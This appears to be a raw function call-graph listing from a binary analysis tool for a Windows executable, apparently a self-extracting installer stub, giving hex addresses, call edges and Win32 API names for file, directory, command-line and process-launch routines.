8429 40a66a 8427->8429 8430 40a687 8428->8430 8431 40a73d 8428->8431 8429->8430 8432 40a704 8429->8432 8433 40a679 8429->8433 8440 40a6ad 8430->8440 8531 40a3b0 8430->8531 8434 40a6f2 8431->8434 8437 40a747 8431->8437 8438 40a699 8431->8438 8432->8440 8505 40e69c 8432->8505 8433->8434 8435 40a67e 8433->8435 8527 40ed34 8434->8527 8439 40a6b2 8435->8439 8444 40a684 8435->8444 8437->8434 8437->8439 8438->8440 8519 40ed59 8438->8519 8439->8440 8523 40ed79 8439->8523 8514 40ecae 8440->8514 8443 40a71a 8508 40eced 8443->8508 8444->8430 8444->8438 8450 40eca9 VariantClear 8452 40166b 8450->8452 8452->8359 8452->8360 8454 401340 8453->8454 8455 40112b 2 API calls 8454->8455 8456 40134b 8455->8456 8456->8368 8458 4012f7 2 API calls 8457->8458 8459 401462 8458->8459 8546 4013e2 8459->8546 8461 40146d 8461->8372 8463 4024fc 2 API calls 8462->8463 8464 403375 8463->8464 8465 40112b 2 API calls 8464->8465 8468 403385 8464->8468 8465->8468 8467 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8469 4033e8 8467->8469 8470 4033f2 8467->8470 8468->8467 8476 403477 8468->8476 8549 401986 CreateDirectoryW 8468->8549 8471 40301a 22 API calls 8469->8471 8472 401986 4 API calls 8470->8472 8483 4033f8 ??3@YAXPAX 8470->8483 8471->8470 8485 403405 8472->8485 8473 4034a7 8474 407776 55 API calls 8473->8474 8479 4034b1 ??3@YAXPAX 8474->8479 8475 40340a 8555 407776 8475->8555 8476->8473 8476->8483 8477 40346b ??3@YAXPAX 8482 4034bc 8477->8482 8478 40341d memcpy 8478->8485 8479->8482 8482->8393 8483->8482 8484 401986 4 API calls 8484->8485 8485->8475 8485->8477 8485->8478 8485->8484 8487 403037 8486->8487 8493 401804 8486->8493 8488 403048 8487->8488 8489 40303b SetLastError 8487->8489 8490 403051 8488->8490 8492 40305f FindFirstFileW 8488->8492 8488->8493 8489->8493 8574 402fed 8490->8574 8492->8490 8494 403072 FindClose CompareFileTime 8492->8494 8493->8395 8493->8396 8493->8397 8494->8490 8494->8493 8496 40ec65 8495->8496 8497 40ec86 VariantClear 8496->8497 8498 40ec9d 8496->8498 8497->8363 8498->8363 8615 40db3c 8499->8615 8503 40112b 2 API calls 8502->8503 8504 401311 8503->8504 8504->8406 8506 4012f7 2 API calls 8505->8506 8507 40e6a9 8506->8507 8507->8443 8535 40ecd7 8508->8535 8511 40ed12 8512 40a726 ??3@YAXPAX 8511->8512 8513 40ed17 _CxxThrowException 8511->8513 8512->8440 8513->8512 8538 40ec65 8514->8538 8516 40ecba 8517 40a7b2 8516->8517 8518 40ecbe memcpy 8516->8518 8517->8450 8518->8517 8520 40ed62 8519->8520 8521 40ed67 8519->8521 8522 40ecd7 VariantClear 8520->8522 8521->8440 8522->8521 8524 40ed82 8523->8524 8525 40ed87 8523->8525 8526 40ecd7 VariantClear 8524->8526 8525->8440 8526->8525 8528 40ed42 8527->8528 8529 40ed3d 8527->8529 8528->8440 8530 40ecd7 VariantClear 8529->8530 8530->8528 8532 40a3c2 8531->8532 8533 40a3de 8532->8533 8542 40eda0 8532->8542 8533->8440 8536 40eca9 VariantClear 8535->8536 8537 40ecdf SysAllocString 8536->8537 8537->8511 8537->8512 8539 40ec6d 8538->8539 8540 40ec86 VariantClear 8539->8540 8541 40ec9d 8539->8541 8540->8516 8541->8516 8543 40edae 8542->8543 8544 40eda9 8542->8544 8543->8533 8545 40ecd7 VariantClear 8544->8545 8545->8543 8547 401398 2 API calls 8546->8547 8548 4013f2 8547->8548 8548->8461 8550 4019c7 8549->8550 8551 401997 GetLastError 8549->8551 8550->8468 8552 4019b1 GetFileAttributesW 8551->8552 8554 4019a6 8551->8554 8552->8550 8552->8554 8553 4019a7 SetLastError 8553->8468 8554->8550 8554->8553 8556 401f9d 19 API calls 8555->8556 8557 40778a wvsprintfW 8556->8557 8558 407859 8557->8558 8559 4077ab GetLastError FormatMessageW 8557->8559 8562 4076a8 25 API calls 8558->8562 8560 4077d9 FormatMessageW 8559->8560 8561 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8559->8561 8560->8558 8560->8561 8566 4076a8 8561->8566 8564 407865 8562->8564 8564->8483 8567 407715 ??3@YAXPAX LocalFree 8566->8567 8568 4076b7 8566->8568 8567->8564 8569 40661a 2 API calls 8568->8569 8570 4076c6 IsWindow 8569->8570 8571 4076ef 8570->8571 8572 4076dd IsBadReadPtr 8570->8572 8573 4073d1 21 API calls 8571->8573 8572->8571 8573->8567 8580 402c86 8574->8580 8576 402ff6 8577 403017 8576->8577 8578 402ffb GetLastError 8576->8578 8577->8493 8579 403006 8578->8579 8579->8493 8581 402c93 GetFileAttributesW 8580->8581 8582 402c8f 8580->8582 8583 402ca4 8581->8583 8584 402ca9 8581->8584 8582->8576 8583->8576 8585 402cc7 8584->8585 8586 402cad SetFileAttributesW 8584->8586 8591 402b79 8585->8591 8588 402cc3 8586->8588 8589 402cba DeleteFileW 8586->8589 8588->8576 8589->8576 8592 4024fc 2 API calls 8591->8592 8593 402b90 8592->8593 8594 40254d 2 API calls 8593->8594 8595 402b9d FindFirstFileW 8594->8595 8596 402c55 SetFileAttributesW 8595->8596 8609 402bbf 8595->8609 8598 402c60 RemoveDirectoryW 8596->8598 8599 402c78 ??3@YAXPAX 8596->8599 8597 401329 2 API calls 8597->8609 8598->8599 8600 402c6d ??3@YAXPAX 8598->8600 8601 402c80 8599->8601 8600->8601 8601->8576 8603 40254d 2 API calls 8603->8609 8604 402c24 SetFileAttributesW 8604->8599 8606 402c2d DeleteFileW 8604->8606 8605 402bef lstrcmpW 8607 402c05 lstrcmpW 8605->8607 8608 402c38 FindNextFileW 8605->8608 8606->8609 8607->8608 8607->8609 8608->8609 8610 402c4e FindClose 8608->8610 8609->8597 8609->8599 8609->8603 8609->8604 8609->8605 8609->8608 8611 402b79 2 API calls 8609->8611 8612 401429 8609->8612 8610->8596 8611->8609 8613 401398 2 API calls 8612->8613 8614 401433 8613->8614 8614->8609 8616 40db1f 2 API calls 8615->8616 8617 401857 8616->8617 8617->8401 8617->8402 8619 40af0c 8618->8619 8634 408ebd 8618->8634 8619->8634 8711 40ac7a 8619->8711 8621 40af3f 8622 40ac7a 7 API calls 8621->8622 8623 40b0cb 8621->8623 8627 40af96 8622->8627 8625 40e959 ctype 4 API calls 8623->8625 8624 40afbd 8718 40e959 8624->8718 8625->8634 8627->8623 8627->8624 8628 40b043 8631 40e959 ctype 4 API calls 8628->8631 8629 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8630 40afc6 8629->8630 8630->8628 8630->8629 8632 40b07f 8631->8632 8633 40e959 ctype 4 API calls 8632->8633 8633->8634 8634->8298 8635 4065ea InitializeCriticalSection 8634->8635 8635->8310 8730 4086f0 8636->8730 8682 40cdc7 8681->8682 8683 408761 4 API calls 8682->8683 8684 40cdde 8683->8684 8684->8310 8712 40e8da ctype 3 API calls 8711->8712 8713 40ac86 8712->8713 8722 40e811 8713->8722 8715 40aca2 8715->8621 8716 409403 4 API calls 8717 40ac90 8716->8717 8717->8715 8717->8716 8719 40e93b 8718->8719 8720 40e8da ctype 3 API calls 8719->8720 8721 40e943 ??3@YAXPAX 8720->8721 8721->8630 8723 40e8a5 8722->8723 8724 40e824 8722->8724 8723->8717 8725 40e833 _CxxThrowException 8724->8725 8726 40e863 ??2@YAPAXI 8724->8726 8727 40e895 ??3@YAXPAX 8724->8727 8725->8724 8726->8724 8728 40e879 memcpy 8726->8728 8727->8723 8728->8727 8731 40e8da ctype 3 API calls 8730->8731 8732 4086f8 8731->8732 8733 40e8da ctype 3 API calls 8732->8733 8734 408700 8733->8734 8735 40e8da ctype 3 API calls 8734->8735 8736 408708 8735->8736 9102 40dace 9105 40daac 9102->9105 9108 40da8f 9105->9108 9109 40da56 2 API calls 9108->9109 9110 40daa9 9109->9110 9092 40dadc ReadFile 9111 411def __set_app_type __p__fmode __p__commode 9112 411e5e 9111->9112 9113 411e72 9112->9113 9114 411e66 __setusermatherr 9112->9114 9123 411f66 _controlfp 9113->9123 9114->9113 9116 411e77 _initterm __getmainargs _initterm 9117 411ecb GetStartupInfoA 9116->9117 9119 411eff GetModuleHandleA 9117->9119 9124 4064af _EH_prolog 9119->9124 9123->9116 9127 404faa 9124->9127 9432 401b37 GetModuleHandleW CreateWindowExW 9127->9432 9130 404fdc 9131 40648e MessageBoxA 9130->9131 9133 404ff6 9130->9133 9132 4064a5 exit _XcptFilter 9131->9132 9134 401411 2 API calls 9133->9134 9135 40502d 9134->9135 9136 401411 2 API calls 9135->9136 9137 405035 9136->9137 9435 403e23 9137->9435 9142 40254d 2 API calls 9143 405073 9142->9143 9444 402a69 9143->9444 9145 40507c 9458 403d71 9145->9458 9149 40509b _wtol 9151 4050b1 9149->9151 9150 4050d6 9152 403d71 6 API calls 9150->9152 9463 404405 9151->9463 9153 4050e1 9152->9153 9154 4050e7 9153->9154 9155 405118 9153->9155 9620 404996 9154->9620 9156 405130 GetModuleFileNameW 9155->9156 9158 40112b 2 API calls 9155->9158 9159 405151 9156->9159 9160 405142 9156->9160 9158->9156 9165 403d71 6 API calls 9159->9165 9161 407776 55 API calls 9160->9161 9170 4050ec 9161->9170 9162 4050ee ??3@YAXPAX 9638 403e70 9162->9638 9164 4050ff ??3@YAXPAX ??3@YAXPAX 9164->9132 9178 405173 9165->9178 9166 4052d5 9167 401362 2 API calls 9166->9167 9168 4052e5 9167->9168 9169 401362 2 API calls 9168->9169 9173 4052f2 9169->9173 9170->9162 9171 4051fa 9171->9170 9172 40522a 9171->9172 9175 405213 _wtol 9171->9175 9176 403d71 6 API calls 9172->9176 9174 40538d ??2@YAPAXI 9173->9174 9177 401329 2 API calls 9173->9177 9184 405399 9174->9184 9175->9172 9182 405289 9176->9182 9179 405327 9177->9179 9178->9166 9178->9170 9178->9171 9178->9172 9181 401429 2 API calls 9178->9181 9180 401329 2 API calls 9179->9180 9186 40533d 9180->9186 9181->9178 9182->9166 9183 404594 2 API calls 9182->9183 9185 4052ba 9183->9185 9187 4053cf 9184->9187 9191 407776 55 API calls 9184->9191 9185->9166 9189 401362 2 API calls 9185->9189 9190 401362 2 API calls 9186->9190 9488 4025ae 9187->9488 9189->9166 9193 405367 9190->9193 9191->9187 9195 401f9d 19 API calls 9193->9195 9194 4025ae 2 API calls 9196 4053f6 9194->9196 9197 40536e 9195->9197 9198 4025ae 2 API calls 9196->9198 9199 40254d 2 API calls 9197->9199 9201 4053fe 9198->9201 9200 405377 9199->9200 9200->9174 9491 404e3f 9201->9491 9206 40546f 9207 405534 9206->9207 9210 403d71 6 API calls 9206->9210 9209 40e8da ctype 3 API calls 9207->9209 9208 402844 10 API calls 9211 405441 9208->9211 9212 40553c 9209->9212 9213 405493 9210->9213 9211->9206 9214 407776 55 API calls 9211->9214 9215 405573 9212->9215 9669 403093 9212->9669 9213->9207 9224 40549d 9213->9224 9216 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9214->9216 9218 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9215->9218 9219 40557c 9215->9219 9216->9206 9218->9162 9218->9170 9222 405588 wsprintfW 9219->9222 9223 4055ed 9219->9223 9230 401411 2 API calls 9219->9230 9232 401329 ??2@YAPAXI ??3@YAXPAX 9219->9232 9234 401f9d 19 API calls 9219->9234 9703 402f6c ??2@YAPAXI 9219->9703 9709 402425 ??3@YAXPAX ??3@YAXPAX 9219->9709 9221 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9225 4054f5 9221->9225 9226 401411 2 API calls 9222->9226 9519 404603 9223->9519 9224->9218 9643 404cbc 9224->9643 9225->9218 9226->9219 9229 4054cc 9229->9218 9231 407776 55 API calls 9229->9231 9230->9219 9233 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9231->9233 9232->9219 9233->9225 9234->9219 9235 40584a 9236 404603 26 API calls 9235->9236 9268 40586a 9236->9268 9240 405933 9581 404034 9240->9581 9241 4024fc 2 API calls 9241->9268 9245 4059d8 CoInitialize 9251 40243b lstrcmpW 9245->9251 9246 40595a 9249 40243b lstrcmpW 9246->9249 9247 405935 ??3@YAXPAX 9247->9240 9250 405969 9249->9250 9252 405979 9250->9252 9255 401f9d 19 API calls 9250->9255 9253 4059fe 9251->9253 9736 403b40 9252->9736 9256 405a12 9253->9256 9259 401329 2 API calls 9253->9259 9254 401411 ??2@YAPAXI ??3@YAXPAX 9254->9268 9255->9252 9587 403b59 9256->9587 9258 401362 2 API calls 9258->9268 9259->9256 9263 4073d1 21 API calls 9267 40599c ctype 9263->9267 9264 401329 2 API calls 9264->9268 9265 4055f6 9265->9235 9275 403b94 lstrlenW lstrlenW _wcsnicmp 9265->9275 9279 4057dd _wtol 9265->9279 9294 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9265->9294 9710 40484d 9265->9710 9721 40408b 9265->9721 9266 405a4d 9272 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9266->9272 9308 405a61 9266->9308 9756 4082e9 9266->9756 9273 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9267->9273 9268->9240 9268->9241 9268->9247 9268->9254 9268->9258 9268->9264 9271 402f6c 7 API calls 9268->9271 9578 40243b 9268->9578 9735 402425 ??3@YAXPAX ??3@YAXPAX 9268->9735 9271->9268 9272->9266 9273->9170 9275->9265 9276 405910 ??3@YAXPAX 9276->9268 9277 401411 2 API calls 9277->9308 9279->9265 9280 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9301 405bf3 9280->9301 9281 405a9f GetKeyState 9281->9308 9282 405c6c 9285 405ca2 9282->9285 9286 405c74 9282->9286 9283 401329 ??2@YAPAXI ??3@YAXPAX 9283->9308 9284 40243b lstrcmpW 9284->9308 9289 4012f7 2 API calls 9285->9289 9798 403f85 9286->9798 9292 405cb0 9289->9292 9295 403b59 15 API calls 9292->9295 9293 401362 2 API calls 9299 405c91 ??3@YAXPAX 9293->9299 9294->9170 9297 405cb9 9295->9297 9296 407776 55 API calls 9298 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9296->9298 9300 405cca ??3@YAXPAX 9297->9300 9304 401362 2 API calls 9297->9304 9298->9301 9305 405cd9 9299->9305 9300->9305 9301->9296 9302 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9301->9302 9302->9301 9303 405bcd ??3@YAXPAX 9303->9308 9304->9300 9306 405d24 9305->9306 9307 405d16 9305->9307 9811 40786b 9306->9811 9594 404a44 9307->9594 9308->9277 9308->9280 9308->9281 9308->9282 9308->9283 9308->9284 9308->9301 9308->9302 9308->9303 9311 401429 ??2@YAPAXI ??3@YAXPAX 9308->9311 9783 407613 9308->9783 9792 407674 9308->9792 9311->9308 9312 405d20 9313 405d65 9312->9313 9817 403e0d 9312->9817 9314 404034 21 API calls 9313->9314 9316 405d77 9314->9316 9318 406373 9316->9318 9319 401411 2 API calls 9316->9319 9321 4063f7 ctype 9318->9321 9324 40243b lstrcmpW 9318->9324 9320 405d95 9319->9320 9364 405da8 9320->9364 9821 40453e 9320->9821 9323 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9321->9323 9329 40243b lstrcmpW 9321->9329 9325 406461 9323->9325 9326 406467 ??3@YAXPAX 9323->9326 9327 4063a4 9324->9327 9325->9326 9328 403e70 ctype 4 API calls 9326->9328 9327->9321 9848 403f48 9327->9848 9330 406478 ??3@YAXPAX ??3@YAXPAX 9328->9330 9332 406416 9329->9332 9330->9132 9331 401411 ??2@YAPAXI ??3@YAXPAX 9331->9364 9332->9323 9336 406423 9332->9336 9335 405dd8 9338 405de5 9335->9338 9339 4061fa ??3@YAXPAX ??3@YAXPAX 9335->9339 9341 4012f7 2 API calls 9336->9341 9337 4073d1 21 API calls 9342 4063e0 ??3@YAXPAX 9337->9342 9830 4043c6 9338->9830 9343 406312 9339->9343 9340 40243b lstrcmpW 9340->9364 9345 406432 9341->9345 9342->9321 9349 40636a ??3@YAXPAX 9343->9349 9350 404034 21 API calls 9343->9350 9853 404aff 9345->9853 9348 405e45 9352 401329 2 API calls 9348->9352 9349->9318 9354 406321 9350->9354 9355 405e4e 9352->9355 9353 4043c6 2 API calls 9356 405e0e 9353->9356 9838 4048ab 9354->9838 9360 403b7f 19 API calls 9355->9360 9361 401362 2 API calls 9356->9361 9358 40626b ??3@YAXPAX ??3@YAXPAX 9358->9343 9359 401329 2 API calls 9359->9364 9378 405e57 9360->9378 9362 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9361->9362 9365 406211 9362->9365 9366 405e41 9362->9366 9363 40633a SetCurrentDirectoryW 9367 4048ab 4 API calls 9363->9367 9364->9331 9364->9335 9364->9340 9364->9348 9364->9358 9364->9359 9368 401429 2 API calls 9364->9368 9371 403e0d 16 API calls 9365->9371 9366->9348 9369 406362 9367->9369 9370 405ee5 ??3@YAXPAX ??3@YAXPAX 9368->9370 9372 403e0d 16 API calls 9369->9372 9370->9364 9373 406216 9371->9373 9372->9349 9374 407776 55 API calls 9373->9374 9375 40621f 7 API calls 9374->9375 9376 40625e 9375->9376 9376->9358 9377 403bce lstrlenW lstrlenW _wcsnicmp 9377->9378 9378->9377 9379 405f61 _wtol 9378->9379 9380 406025 9378->9380 9379->9378 9381 406080 9380->9381 9382 40602e 9380->9382 9383 401362 2 API calls 9381->9383 9384 406053 9382->9384 9385 406034 9382->9385 9386 40607e 9383->9386 9388 401329 2 API calls 9384->9388 9387 401329 2 API calls 9385->9387 9389 40254d 2 API calls 9386->9389 9390 40603f 9387->9390 9391 406051 9388->9391 9392 406092 9389->9392 9393 40254d 2 API calls 9390->9393 9394 40243b lstrcmpW 9391->9394 9395 401411 2 API calls 9392->9395 9396 406048 9393->9396 9397 406068 9394->9397 9398 40609a 9395->9398 9399 40254d 2 API calls 9396->9399 9397->9392 9401 40254d 2 API calls 9397->9401 9400 401411 2 API calls 9398->9400 9399->9391 9402 4060a2 memset 9400->9402 9401->9386 9403 4060e1 9402->9403 9404 404594 2 API calls 9403->9404 9405 4060fe 9404->9405 9406 401329 2 API calls 9405->9406 9407 406109 9406->9407 9408 403b7f 19 API calls 9407->9408 9409 406112 9408->9409 9410 4061b1 9409->9410 9614 4021ed 9409->9614 9412 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9412 9414 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9414 9412->9343 9414->9339 9415 406150 9417 403b7f 19 API calls 9415->9417 9416 401429 2 API calls 9418 406147 9416->9418 9419 406168 ShellExecuteExW 9417->9419 9420 40254d 2 API calls 9418->9420 9422 406282 9419->9422 9423 40618c 9419->9423 9420->9415 9426 407776 55 API calls 9422->9426 9424 4061a0 CloseHandle 9423->9424 9425 406192 WaitForSingleObject 9423->9425 9835 402185 9424->9835 9425->9424 9428 40628c 9426->9428 9429 403e0d 16 API calls 9428->9429 9430 406291 9 API calls 9429->9430 9431 4062e1 9430->9431 9431->9412 9433 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9432->9433 9434 401b9f GetVersionExW 9432->9434 9433->9434 9434->9130 9434->9131 9436 40112b 2 API calls 9435->9436 9437 403e38 GetCommandLineW 9436->9437 9438 404594 9437->9438 9439 4045ce 9438->9439 9441 4045a2 9438->9441 9440 4045c6 9439->9440 9443 401429 2 API calls 9439->9443 9440->9142 9441->9440 9442 401429 2 API calls 9441->9442 9442->9441 9443->9439 9445 401411 2 API calls 9444->9445 9453 402a79 9445->9453 9446 401362 2 API calls 9447 402b6c ??3@YAXPAX 9446->9447 9447->9145 9448 402b5f 9448->9446 9450 401411 2 API calls 9450->9453 9451 401429 ??2@YAPAXI ??3@YAXPAX 9451->9453 9453->9448 9453->9450 9453->9451 9454 401362 2 API calls 9453->9454 9892 4025c6 9453->9892 9895 40272e 9453->9895 9455 402ad9 ??3@YAXPAX 9454->9455 9456 4013e2 2 API calls 9455->9456 9457 402aee ??3@YAXPAX ??3@YAXPAX 9456->9457 9457->9453 9459 403d80 9458->9459 9460 403dbd 9459->9460 9461 403d9a lstrlenW lstrlenW 9459->9461 9460->9149 9460->9151 9906 401a85 9461->9906 9464 401f47 3 API calls 9463->9464 9465 404416 9464->9465 9466 401f9d 19 API calls 9465->9466 9467 40441d 9466->9467 9468 401f9d 19 API calls 9467->9468 9469 404429 9468->9469 9470 401f9d 19 API calls 9469->9470 9471 404435 9470->9471 9472 401f9d 19 API calls 9471->9472 9473 404441 9472->9473 9474 401f9d 19 API calls 9473->9474 9475 40444d 9474->9475 9476 401f9d 19 API calls 9475->9476 9477 404459 9476->9477 9478 401f9d 19 API calls 9477->9478 9479 404465 9478->9479 9480 404480 SHGetSpecialFolderPathW 9479->9480 9483 404533 #17 9479->9483 9484 401411 2 API calls 9479->9484 9485 401329 ??2@YAPAXI ??3@YAXPAX 9479->9485 9487 402f6c 7 API calls 9479->9487 9911 402425 ??3@YAXPAX ??3@YAXPAX 9479->9911 9480->9479 9481 40449a wsprintfW 9480->9481 9482 401411 2 API calls 9481->9482 9482->9479 9483->9150 9484->9479 9485->9479 9487->9479 9489 4022b0 2 API calls 9488->9489 9490 4025c2 9489->9490 9490->9194 9912 403e86 9491->9912 9493 404e56 9494 403e86 2 API calls 9493->9494 9495 404e65 9494->9495 9916 404343 9495->9916 9499 404e82 ??3@YAXPAX 9500 404343 3 API calls 9499->9500 9501 404e9d 9500->9501 9502 403ec1 2 API calls 9501->9502 9503 404ea8 ??3@YAXPAX wsprintfA 9502->9503 9932 403ef6 9503->9932 9505 404ed0 9506 403ef6 2 API calls 9505->9506 9507 404edb 9506->9507 9508 402844 9507->9508 9509 402851 9508->9509 9517 40dcfb 3 API calls 9509->9517 9510 402863 lstrlenA lstrlenA 9515 402890 9510->9515 9511 40296e 9511->9206 9511->9208 9512 40293b memmove 9512->9511 9512->9515 9513 4028db memcmp 9513->9511 9513->9515 9514 402918 memcmp 9514->9515 9515->9511 9515->9512 9515->9513 9515->9514 9518 40dcc7 GetLastError 9515->9518 9943 402640 9515->9943 9517->9510 9518->9515 9520 40243b lstrcmpW 9519->9520 9521 40461c 9520->9521 9522 40466c 9521->9522 9524 401329 2 API calls 9521->9524 9523 40243b lstrcmpW 9522->9523 9525 40468a 9523->9525 9526 404633 9524->9526 9528 40243b lstrcmpW 9525->9528 9527 401f9d 19 API calls 9526->9527 9529 40463a 9527->9529 9531 4046a2 9528->9531 9530 40254d 2 API calls 9529->9530 9532 404643 9530->9532 9533 40243b lstrcmpW 9531->9533 9534 401329 2 API calls 9532->9534 9535 4046ba 9533->9535 9536 40465c 9534->9536 9538 40243b lstrcmpW 9535->9538 9537 401f9d 19 API calls 9536->9537 9539 404663 9537->9539 9540 4046d2 9538->9540 9541 40254d 2 API calls 9539->9541 9542 4046e9 9540->9542 9543 4046d9 lstrcmpiW 9540->9543 9541->9522 9544 40243b lstrcmpW 9542->9544 9543->9542 9545 4046ff 9544->9545 9546 40243b lstrcmpW 9545->9546 9547 40472c 9546->9547 9550 404739 9547->9550 9946 403d1f 9547->9946 9549 40243b lstrcmpW 9554 40474d 9549->9554 9550->9549 9551 40476d 9553 40243b lstrcmpW 9551->9553 9559 404780 9553->9559 9554->9551 9555 40243b lstrcmpW 9554->9555 9950 403cc6 9554->9950 9555->9554 9556 4047a0 9558 40243b lstrcmpW 9556->9558 9560 4047ac 9558->9560 9559->9556 9561 40243b lstrcmpW 9559->9561 9954 403cf7 9559->9954 9562 40243b lstrcmpW 9560->9562 9561->9559 9563 4047bd 9562->9563 9564 40243b lstrcmpW 9563->9564 9565 4047ce 9564->9565 9566 4047e4 9565->9566 9567 4047db _wtol 9565->9567 9568 40243b lstrcmpW 9566->9568 9567->9566 9569 4047f0 9568->9569 9570 404800 9569->9570 9571 4047f7 _wtol 9569->9571 9572 40243b lstrcmpW 9570->9572 9571->9570 9573 40480c 9572->9573 9574 40243b lstrcmpW 9573->9574 9575 404824 9574->9575 9576 40243b lstrcmpW 9575->9576 9577 40483c 9576->9577 9577->9265 9962 4023dd 9578->9962 9582 404045 9581->9582 9583 404088 9581->9583 9584 4012f7 2 API calls 9582->9584 9585 403b7f 19 API calls 9582->9585 9583->9245 9583->9246 9584->9582 9586 404062 SetEnvironmentVariableW ??3@YAXPAX 9585->9586 9586->9582 9586->9583 9588 40393b 7 API calls 9587->9588 9589 403b69 9588->9589 9590 4039f6 7 API calls 9589->9590 9591 403b74 9590->9591 9592 4027c7 6 API calls 9591->9592 9593 403b7a 9592->9593 9593->9266 9739 4083b6 9593->9739 9966 408676 9594->9966 9596 404a55 ??2@YAPAXI 9597 404a64 9596->9597 9611 40dcfb 3 API calls 9597->9611 9598 404a85 9968 40a7de _EH_prolog 9598->9968 9984 40b2fc 9598->9984 9599 404a95 9600 404ab3 9599->9600 9601 404a99 9599->9601 9603 404ada ??2@YAPAXI 9600->9603 9607 403354 86 API calls 9600->9607 9602 407776 55 API calls 9601->9602 9606 404aa1 9602->9606 9604 404ae6 9603->9604 9605 404aed 9603->9605 10009 404292 9604->10009 9990 40150b 9605->9990 9606->9312 9609 404ac6 9607->9609 9609->9603 9609->9606 9611->9598 9615 402200 LoadLibraryA GetProcAddress 9614->9615 9616 4021fb 9614->9616 9617 40221b 9615->9617 9618 402223 9615->9618 9616->9410 9616->9415 9616->9416 9617->9616 9618->9617 10472 4021b9 LoadLibraryA GetProcAddress 9618->10472 9621 40661a 2 API calls 9620->9621 9622 4049af 9621->9622 9623 401f9d 19 API calls 9622->9623 9624 4049bd 9623->9624 9625 4024fc 2 API calls 9624->9625 9626 4049c7 9625->9626 9627 4049fd 9626->9627 9629 40254d ??2@YAPAXI ??3@YAXPAX 9626->9629 9628 40254d 2 API calls 9627->9628 9630 404a0a 9628->9630 9629->9626 9631 401f9d 19 API calls 9630->9631 9632 404a11 9631->9632 9633 40254d 2 API calls 9632->9633 9634 404a1b 9633->9634 9635 4073d1 21 API calls 9634->9635 9636 404a30 ??3@YAXPAX 9635->9636 9637 404a41 ctype 9636->9637 9637->9170 9639 40e8da ctype 3 API calls 9638->9639 9640 403e7e 9639->9640 9641 40e8da ctype 3 API calls 9640->9641 9642 40e943 ??3@YAXPAX 9641->9642 9642->9164 9644 40db53 2 API calls 9643->9644 9645 404ce8 9644->9645 9646 404d44 9645->9646 9648 4024fc 2 API calls 9645->9648 9647 4025ae 2 API calls 9646->9647 9649 404d4c 9647->9649 9650 404cf7 9648->9650 9651 403e86 2 API calls 9649->9651 9654 404db5 ??3@YAXPAX 9650->9654 9656 403354 86 API calls 9650->9656 9652 404d59 9651->9652 9653 403ef6 2 API calls 9652->9653 9655 404d66 9653->9655 9668 404db1 9654->9668 9657 403ef6 2 API calls 9655->9657 9658 404d1b 9656->9658 9659 404d73 9657->9659 9658->9654 9661 40db53 2 API calls 9658->9661 9660 403ef6 2 API calls 9659->9660 9662 404d80 9660->9662 9663 404d37 9661->9663 9664 40dd5f 2 API calls 9662->9664 9663->9654 9665 404d3b ??3@YAXPAX 9663->9665 9666 404d94 9664->9666 9665->9646 9666->9654 9667 404d9d ??3@YAXPAX 9666->9667 9667->9668 9668->9229 9670 4025ae 2 API calls 9669->9670 9686 4030a8 9670->9686 9671 403301 9672 403344 ??3@YAXPAX 9671->9672 9673 40334e 9672->9673 9673->9215 9673->9221 9674 401411 ??2@YAPAXI ??3@YAXPAX 9674->9686 9676 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9676->9686 9677 401362 2 API calls 9678 4030f3 ??3@YAXPAX ??3@YAXPAX 9677->9678 9679 403303 9678->9679 9678->9686 10480 4029c3 9679->10480 9683 40331c ??3@YAXPAX 9683->9673 9684 4031e5 strncmp 9685 4031d0 strncmp 9684->9685 9684->9686 9685->9684 9685->9686 9686->9671 9686->9674 9686->9676 9686->9677 9686->9679 9686->9684 9687 401362 2 API calls 9686->9687 9688 402640 2 API calls 9686->9688 9691 402640 ??2@YAPAXI ??3@YAXPAX 9686->9691 9693 4023dd lstrcmpW 9686->9693 9694 402f6c 7 API calls 9686->9694 9696 403330 9686->9696 9697 4032b2 lstrcmpW 9686->9697 9701 401329 2 API calls 9686->9701 10474 402986 9686->10474 10479 402425 ??3@YAXPAX ??3@YAXPAX 9686->10479 9689 403252 ??3@YAXPAX 9687->9689 9688->9685 9690 402a69 9 API calls 9689->9690 9692 403263 lstrcmpW 9690->9692 9691->9686 9692->9686 9693->9686 9694->9686 9699 402f6c 7 API calls 9696->9699 9697->9686 9698 4032c0 lstrcmpW 9697->9698 9698->9686 9700 40333c 9699->9700 10498 402425 ??3@YAXPAX ??3@YAXPAX 9700->10498 9701->9686 9704 402f86 9703->9704 9705 402f7b 9703->9705 9707 408761 4 API calls 9704->9707 10500 402668 9705->10500 9708 402f92 9707->9708 9708->9219 9709->9219 9711 4024fc 2 API calls 9710->9711 9712 40485f 9711->9712 9713 40254d 2 API calls 9712->9713 9714 40486c 9713->9714 9715 404888 9714->9715 9716 401429 2 API calls 9714->9716 9717 40254d 2 API calls 9715->9717 9716->9714 9718 404892 9717->9718 9719 40408b 94 API calls 9718->9719 9720 40489d ??3@YAXPAX 9719->9720 9720->9265 9722 4040a2 lstrlenW 9721->9722 9723 4040ce 9721->9723 9724 401a85 4 API calls 9722->9724 9723->9265 9725 4040b8 9724->9725 9725->9722 9725->9723 9726 4040d5 9725->9726 9727 4024fc 2 API calls 9726->9727 9730 4040de 9727->9730 10505 402776 